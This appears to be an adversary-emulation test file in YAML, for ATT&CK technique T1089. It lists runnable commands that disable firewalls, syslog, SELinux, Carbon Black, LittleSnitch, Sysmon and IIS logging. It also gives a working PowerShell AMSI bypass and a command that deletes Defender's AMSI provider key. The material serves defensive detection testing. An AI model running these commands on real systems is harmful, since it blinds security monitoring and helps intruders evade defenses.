JimmyAstle
a969a01805
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key.
183 lines
5.2 KiB
YAML
183 lines
5.2 KiB
YAML
---
|
|
attack_technique: T1089
|
|
display_name: Disabling Security Tools
|
|
|
|
atomic_tests:
|
|
- name: Disable iptables firewall
|
|
description: |
|
|
Disables the iptables firewall
|
|
supported_platforms:
|
|
- linux
|
|
executor:
|
|
name: sh
|
|
command: |
|
|
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
|
|
then
|
|
service iptables stop
|
|
chkconfig off iptables
|
|
service ip6tables stop
|
|
chkconfig off ip6tables
|
|
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
|
|
systemctl stop firewalld
|
|
systemctl disable firewalld
|
|
fi
|
|
|
|
- name: Disable syslog
|
|
description: |
|
|
Disables syslog collection
|
|
supported_platforms:
|
|
- linux
|
|
executor:
|
|
name: sh
|
|
command: |
|
|
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
|
|
then
|
|
service rsyslog stop
|
|
chkconfig off rsyslog
|
|
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
|
|
systemctl stop rsyslog
|
|
systemctl disable rsyslog
|
|
fi
|
|
|
|
- name: Disable Cb Response
|
|
description: |
|
|
Disable the Cb Response service
|
|
supported_platforms:
|
|
- linux
|
|
executor:
|
|
name: sh
|
|
command: |
|
|
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
|
|
then
|
|
service cbdaemon stop
|
|
chkconfig off cbdaemon
|
|
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
|
|
systemctl stop cbdaemon
|
|
systemctl disable cbdaemon
|
|
fi
|
|
|
|
- name: Disable SELinux
|
|
description: |
|
|
Disables SELinux enforcement
|
|
supported_platforms:
|
|
- linux
|
|
executor:
|
|
name: sh
|
|
command: |
|
|
setenforce 0
|
|
|
|
- name: Disable Carbon Black Response
|
|
description: |
|
|
Disables Carbon Black Response
|
|
supported_platforms:
|
|
- macos
|
|
executor:
|
|
name: sh
|
|
command: |
|
|
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
|
|
|
|
- name: Disable LittleSnitch
|
|
description: |
|
|
Disables LittleSnitch
|
|
supported_platforms:
|
|
- macos
|
|
executor:
|
|
name: sh
|
|
command: |
|
|
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
|
|
|
|
- name: Disable OpenDNS Umbrella
|
|
description: |
|
|
Disables OpenDNS Umbrella
|
|
supported_platforms:
|
|
- macos
|
|
executor:
|
|
name: sh
|
|
command: |
|
|
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
|
|
|
|
- name: Unload Sysmon Filter Driver
|
|
description: |
|
|
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
sysmon_driver:
|
|
description: The name of the Sysmon filter driver (this can change from the default)
|
|
type: string
|
|
default: SysmonDrv
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: true
|
|
prereq_command: |
|
|
fltmc.exe filters | findstr #{sysmon_driver}
|
|
command: |
|
|
fltmc.exe unload #{sysmon_driver}
|
|
cleanup_command: |
|
|
sc stop sysmon
|
|
fltmc.exe load #{sysmon_driver}
|
|
sc start sysmon
|
|
|
|
- name: Disable Windows IIS HTTP Logging
|
|
description: |
|
|
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
|
|
This action requires HTTP logging configurations in IIS to be unlocked.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
website_name:
|
|
description: The name of the website on a server
|
|
type: string
|
|
default: Default Web Site
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
|
|
|
|
- name: Uninstall Sysmon
|
|
description: |
|
|
Uninstall Sysinternals Sysmon for Defense Evasion
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: true
|
|
prereq_command: |
|
|
sc query sysmon > nul
|
|
command: |
|
|
sysmon -u
|
|
cleanup_command: |
|
|
sysmon -i -accepteula
|
|
|
|
- name: AMSI Bypass - AMSI InitFailed
|
|
description: |
|
|
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
|
|
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
|
|
supported_platforms:
|
|
- windows
|
|
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
command: |
|
|
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
|
|
cleanup_command: |
|
|
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
|
|
|
|
- name: AMSI Bypass - Remove AMSI Provider Reg Key
|
|
description: |
|
|
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
|
|
This test removes the Windows Defender provider registry key.
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
executor:
|
|
name: powershell
|
|
elevation_required: true
|
|
command: |
|
|
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
|
|
cleanup_command: |
|
|
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" |